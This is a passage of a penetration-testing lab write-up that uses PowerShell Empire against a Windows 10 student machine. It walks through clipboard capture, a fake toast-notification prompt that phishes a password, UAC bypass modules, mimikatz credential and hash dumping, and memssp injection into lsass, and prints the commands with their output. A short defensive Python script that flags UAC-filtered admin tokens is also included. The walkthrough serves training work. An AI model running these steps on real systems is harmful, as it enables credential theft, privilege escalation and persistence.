tasked agent E7ULVTA6 to run command ps

2021-11-20 14:36:26 : 
ProcessName              PID Arch UserName             MemUsage 
-----------              --- ---- --------             -------- 
Idle                       0 x64  N/A                  0.01 MB  
System                     4 x64  N/A                  0.09 MB  
Registry                  88 x64  N/A                  19.02 MB 
svchost                  328 x64  N/A                  45.00 MB 
smss                     332 x64  N/A                  0.91 MB  
svchost                  376 x64  N/A                  8.18 MB  
csrss                    416 x64  N/A                  4.07 MB  
....
dllhost                 4500 x64  SEC560STUDENT\sec560 6.84 MB  
SearchUI                4576 x64  SEC560STUDENT\sec560 16.41 MB 
...

Dropping down to the command shell to see what else we can do.

(Empire: SANS560WINlowpriv) > shell
[*] Exit Shell Menu with Ctrl+C
(SANS560WINlowpriv) C:\Users\sec560\Downloads >

Running the whoami command again, to grab information about groups and the integrity level the process is running with.

(SANS560WINlowpriv) C:\Users\sec560\Downloads > cmd.exe /c "whoami /groups"
GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes                                        
============================================================= ================ ============ ==================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Group used for deny only                          
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Group used for deny only                          
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory 
...
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192
(SANS560WINlowpriv) C:\Users\sec560\Downloads >

While the process is not running as administrator, the user running the process is a member of the Administrators group: the group appears with the attribute "Group used for deny only" and the token carries the Medium Mandatory Level label, which is what a UAC-filtered administrator token looks like. This means we can attempt to elevate privileges by taking advantage of something such as bypassuac.
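
As an added example (not from the original post or from Empire), the following parses whoami /groups output and reports whether the token is a UAC-filtered administrator token, the condition described above. An auditor can run it over output collected from many hosts to find accounts whose everyday sessions are one consent prompt (or one UAC bypass) away from full admin. The two samples are constructed to mirror the format shown above; the SIDs for BUILTIN\Administrators (S-1-5-32-544) and the integrity labels (S-1-16-8192 Medium, S-1-16-12288 High) are the well-known values, and the column widths are our own.

```python
import re

ADMINISTRATORS_SID = "S-1-5-32-544"
# Well-known mandatory integrity label SIDs (S-1-16-<RID>).
INTEGRITY_LEVELS = {
    "S-1-16-4096": "Low",
    "S-1-16-8192": "Medium",
    "S-1-16-12288": "High",
    "S-1-16-16384": "System",
}


def _row(name, typ, sid, attrs=""):
    # Lay a row out with fixed column widths, as whoami does (the widths are ours).
    return f"{name:<40} {typ:<16} {sid:<12} {attrs}".rstrip()


def _sample(admin_attrs, label_name, label_sid):
    return "\n".join([
        "GROUP INFORMATION",
        "-----------------",
        "",
        _row("Group Name", "Type", "SID", "Attributes"),
        _row("=" * 40, "=" * 16, "=" * 12, "=" * 50),
        _row("Everyone", "Well-known group", "S-1-1-0",
             "Mandatory group, Enabled by default, Enabled group"),
        _row("BUILTIN\\Administrators", "Alias", ADMINISTRATORS_SID, admin_attrs),
        _row("BUILTIN\\Users", "Alias", "S-1-5-32-545",
             "Mandatory group, Enabled by default, Enabled group"),
        _row(label_name, "Label", label_sid),
    ])


# Constructed samples: the filtered token seen in the post, and what the same account
# looks like once it is running elevated.
SAMPLE_FILTERED = _sample("Group used for deny only",
                          "Mandatory Label\\Medium Mandatory Level", "S-1-16-8192")
SAMPLE_ELEVATED = _sample("Mandatory group, Enabled by default, Enabled group, Group owner",
                          "Mandatory Label\\High Mandatory Level", "S-1-16-12288")


def parse_whoami_groups(text: str) -> list:
    """Split `whoami /groups` output into dicts, using the ==== ruler for column bounds."""
    lines = text.splitlines()
    for i, line in enumerate(lines):
        if line.startswith("="):
            spans = [m.span() for m in re.finditer(r"=+", line)]
            break
    else:
        raise ValueError("no column ruler found; is this `whoami /groups` output?")
    groups = []
    for row in lines[i + 1:]:
        if not row.strip():
            break
        cells = [row[s:e].strip() for s, e in spans[:-1]]
        cells.append(row[spans[-1][0]:].strip())  # attributes may exceed the ruler width
        groups.append(dict(zip(("name", "type", "sid", "attributes"), cells)))
    return groups


def assess_token(groups: list) -> dict:
    """Classify the token: plain user, UAC-filtered admin, or elevated admin."""
    admin = next((g for g in groups if g["sid"] == ADMINISTRATORS_SID), None)
    integrity = next((INTEGRITY_LEVELS.get(g["sid"], g["sid"]) for g in groups
                      if g["type"] == "Label"), "Unknown")
    deny_only = admin is not None and "deny only" in admin["attributes"].lower()
    return {
        "admin_member": admin is not None,
        "integrity": integrity,
        # Admin group present but deny-only at Medium integrity: UAC stripped it from
        # this token, so the account is admin-capable without being admin right now.
        "filtered_admin_token": deny_only and integrity == "Medium",
        "elevated": admin is not None and not deny_only and integrity in ("High", "System"),
    }


if __name__ == "__main__":
    for label, sample in (("filtered", SAMPLE_FILTERED), ("elevated", SAMPLE_ELEVATED)):
        print(label, assess_token(parse_whoami_groups(sample)))
```

Feeding it real output is a matter of capturing `whoami /groups` per host (for example from a logon script) and counting how many interactive sessions report filtered_admin_token; each of those is a user who should probably have a separate admin account instead.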

Confirming the users who are part of the administrators group.

(SANS560WINlowpriv) C:\Users\sec560\Downloads > whoami
SEC560STUDENT\sec560

(SANS560WINlowpriv) C:\Users\sec560\Downloads > net localgroup administrators

Looking at the agent.log.

2021-11-20 15:11:55 : 
tasked agent E7ULVTA6 to run command net localgroup administrators

2021-11-20 15:12:29 : 
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
john
sec560
The command completed successfully.

Going back to the Empire environment to perform additional analysis of the host.

Grabbing a screenshot of the system.

2021-11-20 15:17:49 : 
tasked agent E7ULVTA6 to run module Get-Screenshot

2021-11-20 15:18:30 : 
[+] Output saved to ./downloads/SANS560WINlowpriv/Get-Screenshot/SEC560STUDENT_2021-11-20_15-18-30.jpg

Opening the screenshot, we see 

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# xdg-open /var/lib/powershell-empire/downloads/SANS560WINlowpriv/Get-Screenshot/SEC560STUDENT_2021-11-20_15-18-30.jpg &

Powershell Empire Screenshot

Grabbing a screenshot from a different perspective.

(Empire: agents) > usemodule powershell/collection/screenshot

┌Record Options────┬──────────┬───────────────────────────────────┐
│ Name  │ Value    │ Required │ Description                       │
├───────┼──────────┼──────────┼───────────────────────────────────┤
│ Agent │ E7ULVTA6 │ True     │ Agent to run module on.           │
├───────┼──────────┼──────────┼───────────────────────────────────┤
│ Ratio │ 80       │ False    │ JPEG Compression ratio: 1 to 100. │
└───────┴──────────┴──────────┴───────────────────────────────────┘

(Empire: usemodule/powershell/collection/screenshot) > execute
[*] Tasked E7ULVTA6 to run Task 8
[+] Output saved to ./downloads/SANS560WINlowpriv/Get-Screenshot/SEC560STUDENT_2021-11-20_16-10-26.jpg
(Empire: usemodule/powershell/collection/screenshot) >

Trying to run mimikatz.

(Empire: SANS560WINlowpriv) > mimikatz
[!] Error: module needs to run in an elevated context

Ooops!! Looks like we definitely need those elevated privileges. Let's see what else can be learned about the system.

Grabbing contents from the clipboard.

(Empire: SANS560WINlowpriv) > usemodule powershell/collection/clipboard_monitor
[*] Set Agent to SANS560WINlowpriv


┌Record Options───┬───────────────────┬──────────┬─────────────────────────────────────┐
│ Name            │ Value             │ Required │ Description                         │
├─────────────────┼───────────────────┼──────────┼─────────────────────────────────────┤
│ Agent           │ SANS560WINlowpriv │ True     │ Agent to run module on.             │
├─────────────────┼───────────────────┼──────────┼─────────────────────────────────────┤
│ CollectionLimit │                   │ False    │ Specifies the interval in minutes   │
│                 │                   │          │ to capture clipboard text. Defaults │
│                 │                   │          │ to indefinite collection.           │
├─────────────────┼───────────────────┼──────────┼─────────────────────────────────────┤
│ PollInterval    │ 15                │ True     │ Interval (in seconds) to check the  │
│                 │                   │          │ clipboard for changes, defaults to  │
│                 │                   │          │ 15 seconds.                         │
└─────────────────┴───────────────────┴──────────┴─────────────────────────────────────┘

(Empire: usemodule/powershell/collection/clipboard_monitor) > set CollectionLimit 5
[*] Set CollectionLimit to 5
(Empire: usemodule/powershell/collection/clipboard_monitor) > execute
[*] Tasked SANS560WINlowpriv to run Task 9


Looking at the agent.log, we see.

2021-11-20 16:14:27 : 
Job started: XGSUZT

2021-11-20 16:15:28 : 
=== Get-ClipboardContents Starting at 20/11/2021:21:18:02:34 ===

=== 20/11/2021:21:18:02:58 ===

credentials for securitynik.local - securitynik:Password1
credentials for securitynik mail  - securitynik:Password1Mail
credentials for securitynik cloud  - securitynik:Password1Cloud

Running checks for possible privilege escalation vectors.

(Empire: SANS560WINlowpriv) > usemodule powershell/privesc/powerup/allchecks
[*] Set Agent to SANS560WINlowpriv

┌Record Options──┬───────────────────┬──────────┬─────────────────────────────────────┐
│ Name           │ Value             │ Required │ Description                         │
├────────────────┼───────────────────┼──────────┼─────────────────────────────────────┤
│ Agent          │ SANS560WINlowpriv │ True     │ Agent to run module on.             │
├────────────────┼───────────────────┼──────────┼─────────────────────────────────────┤
│ OutputFunction │ Out-String        │ False    │ PowerShell's output function to use │
│                │                   │          │ ("Out-String", "ConvertTo-Json",    │
│                │                   │          │ "ConvertTo-Csv", "ConvertTo-Html",  │
│                │                   │          │ "ConvertTo-Xml").                   │
└────────────────┴───────────────────┴──────────┴─────────────────────────────────────┘

(Empire: usemodule/powershell/privesc/powerup/allchecks) > execute
[*] Tasked SANS560WINlowpriv to run Task 10

Looking at the agent.log.

2021-11-20 16:29:34 : 
Job started: NHVZSR

2021-11-20 16:30:34 : 

[*] Running Invoke-AllChecks


[*] Checking if user is in a local group with administrative privileges...
[+] User is in a local group that grants administrative privileges!
[+] Run a BypassUAC attack to elevate privileges to admin.

...
[*] Checking service executable and argument permissions...
...
[*] Checking service permissions...
[*] Checking %PATH% for potentially hijackable DLL locations...
...
[*] Checking for AlwaysInstallElevated registry key...
[*] Checking for Autologon credentials in registry...
[*] Checking for modifidable registry autoruns and configs...
[*] Checking for modifiable schtask files/configs...
[*] Checking for unattended install files...
[*] Checking for encrypted web.config strings...
[*] Checking for encrypted application pool and virtual directory passwords...
[*] Checking for plaintext passwords in McAfee SiteList.xml files....
[*] Checking for cached Group Policy Preferences .xml files....

Invoke-AllChecks completed

Since the recommendation above is to run a UAC Bypass attack, let's follow that guidance.

4.  Elevate Privileges

There are a few different ways to elevate our privileges. First, let's confirm our current privileges.

(Empire: usemodule/powershell/privesc/powerup/allchecks) > agents

┌Agents──────────────────┬────────────┬─────────────┬──────────────────────┬────────────┬──────┬────────┬─────────────────────────┬──────────┐
│ ID │ Name              │ Language   │ Internal IP │ Username             │ Process    │ PID  │ Delay  │ Last Seen               │ Listener │
├────┼───────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤
│ 1  │ SANS560WINlowpriv │ powershell │ 10.0.0.110  │ SEC560STUDENT\sec560 │ powershell │ 3600 │ 60/0.0 │ 2021-11-20 16:34:35 EST │ http     │                                                                                    
│    │                   │            │             │                      │            │      │        │ (26 seconds ago)        │          │                                                                                    
└────┴───────────────────┴────────────┴─────────────┴──────────────────────┴────────────┴──────┴────────┴─────────────────────────┴──────────┘

What you will notice above is that, once we gain elevated privileges, the agent name will be marked with an asterisk (*).


First, let's use the toasted option, to "ask" the user for their credentials.

(Empire: SANS560WINlowpriv) > usemodule powershell/collection/toasted
[*] Set Agent to SANS560WINlowpriv

(Empire: usemodule/powershell/collection/toasted) >  set CredBoxTitle "SecurityNik is asking you to restart ;-)"
[*] Set CredBoxTitle to SecurityNik is asking you to restart ;-)

(Empire: usemodule/powershell/collection/toasted) > options

┌Record Options──┬───────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name           │ Value                             │ Required │ Description                         │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent          │ SANS560WINlowpriv                 │ True     │ Agent to phish credentials from     │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Application    │ System Configuration              │ True     │ Name of the application to claim    │
│                │                                   │          │ launched the prompt (ie. "outlook", │
│                │                                   │          │ "explorer")                         │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ CredBoxMessage │ Authentication is required to     │ True     │ Message of the box prompting for    │
│                │ reschedule a system restart       │          │ credentials                         │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ CredBoxTitle   │ SecurityNik is asking you to      │ True     │ Title on the box prompting for      │
│                │ restart ;-)                       │          │ credentials                         │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ HideProcess    │                                   │ False    │ Switch. True/False to hide the      │
│                │                                   │          │ window of the process we claim      │
│                │                                   │          │ launched the prompt (default =      │
│                │                                   │          │ false)                              │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ToastMessage   │ Windows will soon restart to      │ True     │ Message of toast notification box   │
│                │ complete applying recently        │          │                                     │
│                │ installed updates. Use the drop   │          │                                     │
│                │ down below to reschedule the      │          │                                     │
│                │ restart for a later time.         │          │                                     │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ToastTitle     │ Windows will restart in 5 minutes │ True     │ Title of toast notification box     │
│                │ to finish installing updates      │          │                                     │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ToastType      │ System                            │ True     │ Type of Toast notification          │
│                │                                   │          │ ("System" or "Application")         │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ VerifyCreds    │                                   │ False    │ Switch. True/False to verify the    │
│                │                                   │          │ creds a user provides, and prompt   │
│                │                                   │          │ them again until they either click  │
│                │                                   │          │ cancel or enter valid creds         │
│                │                                   │          │ (default = false)                   │
└────────────────┴───────────────────────────────────┴──────────┴─────────────────────────────────────┘

Time to execute ...

(Empire: usemodule/powershell/collection/toasted) > execute
[*] Tasked SANS560WINlowpriv to run Task 11

In the first instance, I was a bit too slow to click and thus got the following message:

2021-11-20 16:39:07 : 
tasked agent SANS560WINlowpriv to run module Invoke-CredentialPhisher

2021-11-20 16:40:22 : 
[-] User did not click on notification

I then ran execute again and this time got:

Empire Toasted

Looking at the agent.log, we now see the credentials.

2021-11-20 16:44:37 : 
[+] Phished credentials [Not-verified]: SEC560STUDENT/securitynik@securitynik.local Testing1

At this point, we can use those credentials in other ways. Let's find another way to elevate privileges via UAC bypass as recommended previously.

(Empire: SANS560WINlowpriv) > usemodule powershell/privesc/bypassuac
[*] Set Agent to SANS560WINlowpriv

(Empire: usemodule/powershell/privesc/bypassuac) > set UserAgent SecurityNik-AUCBypass-User-Agent
[*] Set UserAgent to SecurityNik-AUCBypass-User-Agent

(Empire: usemodule/powershell/privesc/bypassuac) > set Listener http
[*] Set Listener to http

Reviewing the configuration.

(Empire: usemodule/powershell/privesc/bypassuac) > options

┌Record Options────┬──────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name             │ Value                            │ Required │ Description                         │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent            │ SANS560WINlowpriv                │ True     │ Agent to run module on.             │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Bypasses         │ mattifestation etw               │ False    │ Bypasses as a space separated list  │
│                  │                                  │          │ to be prepended to the launcher.    │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener         │ http                             │ True     │ Listener to use.                    │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Obfuscate        │ False                            │ False    │ Switch. Obfuscate the launcher      │
│                  │                                  │          │ powershell code, uses the           │
│                  │                                  │          │ ObfuscateCommand for obfuscation    │
│                  │                                  │          │ types. For powershell only.         │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ObfuscateCommand │ Token\All\1                      │ False    │ The Invoke-Obfuscation command to   │
│                  │                                  │          │ use. Only used if Obfuscate switch  │
│                  │                                  │          │ is True. For powershell only.       │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy            │ default                          │ False    │ Proxy to use for request (default,  │
│                  │                                  │          │ none, or other).                    │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds       │ default                          │ False    │ Proxy credentials                   │
│                  │                                  │          │ ([domain\]username:password) to use │
│                  │                                  │          │ for request (default, none, or      │
│                  │                                  │          │ other).                             │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent        │ SecurityNik-AUCBypass-User-Agent │ False    │ User-agent string to use for the    │
│                  │                                  │          │ staging request (default, none, or  │
│                  │                                  │          │ other).                             │
└──────────────────┴──────────────────────────────────┴──────────┴─────────────────────────────────────┘

Executing the command

(Empire: usemodule/powershell/privesc/bypassuac) > execute
[*] Tasked SANS560WINlowpriv to run Task 13

Once this was run successfully, a new agent got registered.

[+] New agent 8XW5324B checked in
[*] Sending agent (stage 2) to 8XW5324B at 10.0.0.110

Looking at the agents again, we see.

(Empire: usemodule/powershell/privesc/bypassuac) > agents

┌Agents──────────────────┬────────────┬─────────────┬──────────────────────┬────────────┬──────┬────────┬─────────────────────────┬──────────┐
│ ID │ Name              │ Language   │ Internal IP │ Username             │ Process    │ PID  │ Delay  │ Last Seen               │ Listener │
├────┼───────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤
│ 1  │ SANS560WINlowpriv │ powershell │ 10.0.0.110  │ SEC560STUDENT\sec560 │ powershell │ 3600 │ 60/0.0 │ 2021-11-20 17:05:45 EST │ http     │                                                                                    
│    │                   │            │             │                      │            │      │        │ (38 seconds ago)        │          │                                                                                    
├────┼───────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤
│ 2  │ 8XW5324B*         │ powershell │ 10.0.0.110  │ SEC560STUDENT\sec560 │ powershell │ 4356 │ 60/0.0 │ 2021-11-20 17:05:58 EST │ http     │                                                                                    
│    │                   │            │             │                      │            │      │        │ (25 seconds ago)        │          │                                                                                    
└────┴───────────────────┴────────────┴─────────────┴──────────────────────┴────────────┴──────┴────────┴─────────────────────────┴──────────┘

Notice that the agent with ID 2 has an asterisk (*) next to its name; this marks it as a high-privilege agent. Let's rename this agent and run the agents command again.

(Empire: agents) > rename 8XW5324B SANS560HighPrivBypassUAC
(Empire: agents) > agents

┌Agents──────────────────────────┬────────────┬─────────────┬──────────────────────┬────────────┬──────┬────────┬─────────────────────────┬──────────┐
│ ID │ Name                      │ Language   │ Internal IP │ Username             │ Process    │ PID  │ Delay  │ Last Seen               │ Listener │
├────┼───────────────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤
│ 1  │ SANS560WINlowpriv         │ powershell │ 10.0.0.110  │ SEC560STUDENT\sec560 │ powershell │ 3600 │ 60/0.0 │ 2021-11-20 17:07:45 EST │ http     │
│    │                           │            │             │                      │            │      │        │ (22 seconds ago)        │          │
├────┼───────────────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤
│ 2  │ SANS560HighPrivBypassUAC* │ powershell │ 10.0.0.110  │ SEC560STUDENT\sec560 │ powershell │ 4356 │ 60/0.0 │ 2021-11-20 17:07:58 EST │ http     │
│    │                           │            │             │                      │            │      │        │ (9 seconds ago)         │          │
└────┴───────────────────────────┴────────────┴─────────────┴──────────────────────┴────────────┴──────┴────────┴─────────────────────────┴──────────┘

Trying to elevate privileges with the ask option. 

(Empire: agents) > interact SANS560WINlowpriv
[*] Task 13 results received
Job started: G1SLA9
(Empire: SANS560WINlowpriv) > usemodule powershell/privesc/ask
[*] Set Agent to SANS560WINlowpriv


(Empire: usemodule/powershell/privesc/ask) >  set UserAgent SecurityNik-UAC-ASK
[*] Set UserAgent to SecurityNik-UAC-ASK

(Empire: usemodule/powershell/privesc/ask) > set Listener http
[*] Set Listener to http


(Empire: usemodule/powershell/privesc/ask) > options

┌Record Options────┬─────────────────────┬──────────┬─────────────────────────────────────┐
│ Name             │ Value               │ Required │ Description                         │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent            │ SANS560WINlowpriv   │ True     │ Agent to run module on.             │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ Bypasses         │ mattifestation etw  │ False    │ Bypasses as a space separated list  │
│                  │                     │          │ to be prepended to the launcher.    │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener         │ http                │ True     │ Listener to use.                    │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ Obfuscate        │ False               │ False    │ Switch. Obfuscate the launcher      │
│                  │                     │          │ powershell code, uses the           │
│                  │                     │          │ ObfuscateCommand for obfuscation    │
│                  │                     │          │ types. For powershell only.         │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ ObfuscateCommand │ Token\All\1         │ False    │ The Invoke-Obfuscation command to   │
│                  │                     │          │ use. Only used if Obfuscate switch  │
│                  │                     │          │ is True. For powershell only.       │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy            │ default             │ False    │ Proxy to use for request (default,  │
│                  │                     │          │ none, or other).                    │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds       │ default             │ False    │ Proxy credentials                   │
│                  │                     │          │ ([domain\]username:password) to use │
│                  │                     │          │ for request (default, none, or      │
│                  │                     │          │ other).                             │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent        │ SecurityNik-UAC-ASK │ False    │ User-agent string to use for the    │
│                  │                     │          │ staging request (default, none, or  │
│                  │                     │          │ other).                             │
└──────────────────┴─────────────────────┴──────────┴─────────────────────────────────────┘

Executing the code

(Empire: usemodule/powershell/privesc/ask) > execute
[*] Tasked SANS560WINlowpriv to run Task 14

Once again a new agent got registered.

[+] New agent L318PM2Z checked in
[*] Sending agent (stage 2) to L318PM2Z at 10.0.0.110

Giving it a meaningful name.

(Empire: usemodule/powershell/privesc/ask) > agents
(Empire: agents) > rename L318PM2Z SANS560UACAskHighPriv

(Empire: agents) > interact SANS560WINlowpriv
[*] Task 14 results received
[*] Successfully elevated!

Trying one more privilege escalation technique.

(Empire: SANS560WINlowpriv) > usemodule powershell/privesc/bypassuac_eventvwr
[*] Set Agent to SANS560WINlowpriv

(Empire: usemodule/powershell/privesc/bypassuac_eventvwr) > set UserAgent SecurityNik-EventVwr-UAC-Bypass
[*] Set UserAgent to SecurityNik-EventVwr-UAC-Bypass

(Empire: usemodule/powershell/privesc/bypassuac_eventvwr) > set Listener http
[*] Set Listener to http

(Empire: usemodule/powershell/privesc/bypassuac_eventvwr) > options

┌Record Options────┬─────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name             │ Value                           │ Required │ Description                         │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent            │ SANS560WINlowpriv               │ True     │ Agent to run module on.             │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Bypasses         │ mattifestation etw              │ False    │ Bypasses as a space separated list  │
│                  │                                 │          │ to be prepended to the launcher.    │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener         │ http                            │ True     │ Listener to use.                    │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Obfuscate        │ False                           │ False    │ Switch. Obfuscate the launcher      │
│                  │                                 │          │ powershell code, uses the           │
│                  │                                 │          │ ObfuscateCommand for obfuscation    │
│                  │                                 │          │ types. For powershell only.         │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ObfuscateCommand │ Token\All\1                     │ False    │ The Invoke-Obfuscation command to   │
│                  │                                 │          │ use. Only used if Obfuscate switch  │
│                  │                                 │          │ is True. For powershell only.       │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy            │ default                         │ False    │ Proxy to use for request (default,  │
│                  │                                 │          │ none, or other).                    │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds       │ default                         │ False    │ Proxy credentials                   │
│                  │                                 │          │ ([domain\]username:password) to use │
│                  │                                 │          │ for request (default, none, or      │
│                  │                                 │          │ other).                             │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent        │ SecurityNik-EventVwr-UAC-Bypass │ False    │ User-agent string to use for the    │
│                  │                                 │          │ staging request (default, none, or  │
│                  │                                 │          │ other).                             │
└──────────────────┴─────────────────────────────────┴──────────┴─────────────────────────────────────┘

[*] Tasked SANS560WINlowpriv to run Task 15
(Empire: usemodule/powershell/privesc/bypassuac_eventvwr) >

While I saw entries in the log file and Event Viewer opening up, this did not give me elevated privileges. 

I then tried the WScript bypass module (bypassuac_wscript), which reported the host was not vulnerable.

(Empire: SANS560WINlowpriv) > usemodule powershell/privesc/bypassuac_wscript
[*] Set Agent to SANS560WINlowpriv

2021-11-20 18:45:08 : 
[!] WARNING: Target Not Vulnerable

Now that we have at least two privileged agents, let's get some more credentials.


5. Gaining (more) credentials

With privileges elevated, time to pillage credentials.

Previously when the attempt was made to execute mimikatz, it failed. Trying it once again.

(Empire: SANS560WINlowpriv) > mimikatz
[!] Error: module needs to run in an elevated context

Oops!!! Looks like we need to switch to one of the elevated agents. Interacting with a high-privilege agent.

(Empire: agents) > interact SANS560HighPrivBypassUAC
(Empire: SANS560HighPrivBypassUAC) >

Running mimikatz once again.

(Empire: SANS560HighPrivBypassUAC) > mimikatz
[*] Tasked SANS560HighPrivBypassUAC to run Task 1

Now that is progress.

Even more progress. Looking at the agent log.

2021-11-20 18:49:54 : 
tasked agent 8XW5324B to run module Invoke-Mimikatz DumpCreds

2021-11-20 18:50:37 : 
Job started: B61KRZ

2021-11-20 18:51:38 : 
Hostname: Sec560Student / S-1-5-21-2977773840-2930198165-1551093962

  .#####.   mimikatz 2.2.0 (x64) #19041 Jun  9 2021 18:55:28
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 3548381 (00000000:003624dd) 
Session           : Service from 0 
User Name         : DefaultAppPool  
Domain            : IIS APPPOOL 
Logon Server      : (null)    
Logon Time        : 11/20/2021 5:55:46 PM                                                                                
SID               : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
        msv :
        tspkg :
        wdigest :
         * Username : SEC560STUDENT$
         * Domain   : SEC560
         * Password : (null)
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 458925 (00000000:000700ad)
Session           : Interactive from 1
User Name         : sec560
Domain            : SEC560STUDENT
Logon Server      : SEC560STUDENT
Logon Time        : 11/20/2021 4:54:39 PM
SID               : S-1-5-21-2977773840-2930198165-1551093962-1202
        msv :
         [00000003] Primary
         * Username : sec560
         * Domain   : SEC560STUDENT
         * NTLM     : 7abdbb1631d1674637aa354c4b4dd273
         * SHA1     : 29282a5203a2e5444ef3053f6ba4943bbb0e3fc4
        tspkg :
        wdigest :
         * Username : sec560
         * Domain   : SEC560STUDENT
         * Password : (null)
        kerberos :
         * Username : sec560
         * Domain   : SEC560STUDENT
         * Password : (null)
        ssp :
        credman :
        cloudap :

...

mimikatz(powershell) # exit
Bye!

Looking at credentials seen by Powershell-Empire. 

(Empire: SANS560HighPrivBypassUAC) > credentials

┌Credentials────┬───────────────┬──────────┬───────────────┬──────────────────────────────────┬─────┬─────────────────────────────────┬─────────────────────┐
│ ID │ CredType │ Domain        │ UserName │ Host          │ Password/Hash                    │ SID │ OS                              │ Notes               │
├────┼──────────┼───────────────┼──────────┼───────────────┼──────────────────────────────────┼─────┼─────────────────────────────────┼─────────────────────┤
│ 1  │ hash     │ SEC560STUDENT │ sec560   │ Sec560Student │ 7abdbb1631d1674637aa354c4b4dd273 │     │ Microsoft Windows 10 Enterprise │ 2021-11-20 18:51:38 │
└────┴──────────┴───────────────┴──────────┴───────────────┴──────────────────────────────────┴─────┴─────────────────────────────────┴─────────────────────┘

Injecting the memssp module into lsass.exe. Once injected, the plaintext credentials of every user who authenticates on the host are written to the C:\Windows\System32\mimilsa.log log file.

(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/persistence/misc/memssp
[*] Set Agent to SANS560HighPrivBypassUAC

(Empire: usemodule/powershell/persistence/misc/memssp) > execute
[*] Tasked SANS560HighPrivBypassUAC to run Task 2

Looking at the agent.log.

2021-11-20 19:06:32 : 
tasked agent SANS560HighPrivBypassUAC to run module Invoke-Mimikatz memssp

2021-11-20 19:07:47 : 
Job started: 7YP5T4

2021-11-20 19:08:47 : 
Hostname: Sec560Student / S-1-5-21-2977773840-2930198165-1551093962

  .#####.   mimikatz 2.2.0 (x64) #19041 Jun  9 2021 18:55:28
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # misc::memssp
Injected =)

memssp installed, check C:\Windows\System32\mimisla.log for logon events.

Connecting to the shell on the host to view the mimilsa.log file.

